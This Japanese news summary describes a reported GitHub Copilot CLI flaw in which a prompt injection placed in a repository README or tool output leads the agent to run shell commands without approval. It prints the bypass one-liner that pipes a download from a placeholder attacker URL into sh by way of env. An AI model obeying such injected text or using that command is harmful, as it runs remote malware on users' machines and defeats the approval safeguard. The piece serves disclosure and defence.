GitHub Copilot CLIの脆弱性により、プロンプトインジェクション経由でのマルウェア実行が可能

脆弱性の概要
GitHub Copilot CLIには、ユーザーの承認なしに間接的なプロンプトインジェクションを介して任意のシェルコマンドが実行される脆弱性が存在します。マルウェアは外部サーバーからダウンロードされ、Copilot CLIへの初期クエリ以外のユーザー操作なしで実行される可能性があります。
攻撃の仕組み
攻撃の連鎖には以下が含まれます:
- ユーザーがオープンソースリポジトリを探索しながらGitHub Copilot CLIにクエリを実行
- CopilotがクローンしたリポジトリのREADMEファイルに保存されたプロンプトインジェクションに遭遇(またはウェブ検索結果、MCPツール呼び出し結果、ターミナルコマンド出力などの他のベクター)
- 悪意のあるコマンドが人間による承認システムを回避
保護メカニズムの回避
GitHub Copilotは、潜在的に有害なコマンドの実行前にユーザーの同意を必要とする人間による承認システムを使用しています。このシステムは、以下の場合を除いてトリガーされます:
- ユーザーがコマンドを自動実行するように明示的に設定している場合
- コマンドがソースコード内のハードコードされた「読み取り専用」リストに含まれている場合
外部URLアクセスチェックでは、curl、wget、またはCopilotの組み込みウェブフェッチツールなどのコマンドに対してユーザーの承認が必要です。しかし、攻撃者は以下の方法を使用してこれらの保護を回避できます:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shenvコマンドはハードコードされた読み取り専用リストに含まれているため、承認なしで自動的に実行されます。curlとshはenvへの引数として渡されるため、バリデータによってサブコマンドとして正しく認識されず、curlなどのコマンドを検出するURL権限チェックを回避します。
GitHubの対応
GitHubは次のように回答しました:「報告内容を確認し、調査結果を検証しました。内部評価の結果、これは既知の問題であり、重大なセキュリティリスクとはならないと判断しました。将来的にはこの機能をより厳格にする可能性がありますが、現時点で発表できることはありません。」
範囲と制限
説明したコマンド解析の脆弱性はmacOS固有のものです。しかし、GitHub Copilotには、OSに依存しないリスクとWindows固有のリスクの両方を含む追加の脆弱性が存在します。他のコマンド解析の脆弱性により、任意のファイルの読み取りと書き込みが可能になります。
📖 完全なソースを読む: HN LLM Tools
👀 See Also
Google脅威インテリジェンスグループ、二要素認証を突破する初のAI開発ゼロデイエクスプロイトを報告
Google Threat Intelligence Groupは、人気のあるオープンソースのWebベースシステム管理ツールにおいて、2要素認証を回避する初の完全AI開発ゼロデイエクスプロイトを、自己変形マルウェアやGeminiを利用したバックドアと共に検出しました。

OpenClawユーザーが、エージェントがAPIキーを平文で公開した後、TOTP 2FAを追加
OpenClawユーザーが「Secure Reveal」というセキュリティスキルを作成しました。このスキルは、保存された認証情報を表示する前に、Telegram経由でのTOTP認証を要求します。これは、デモ中にAIエージェントがAPIキーやパスワードを平文で誤って漏洩させたことを受けた対応です。

Endo Familiar: AIエージェント向けオブジェクトケイパビリティサンドボックス
Endo FamiliarはAIエージェントに対してオブジェクトキャパビリティセキュリティを実装します。エージェントはゼロの環境権限から始まり、特定のファイルやディレクトリへの明示的な参照のみを受け取り、サンドボックス化されたコード内でより狭い権限を派生させることができます。

OpenClawセキュリティ侵害:CEOのエージェントが2万5千ドルで売却、13万5千インスタンスが暴露
英国CEOのOpenClawインスタンスがBreachForumsで25,000ドルで売却され、会話、本番データベース、APIキー、個人情報を含むプレーンテキストMarkdownファイルが流出しました。SecurityScorecardは、安全でないデフォルト設定で公開されている135,000のOpenClawインスタンスを発見しました。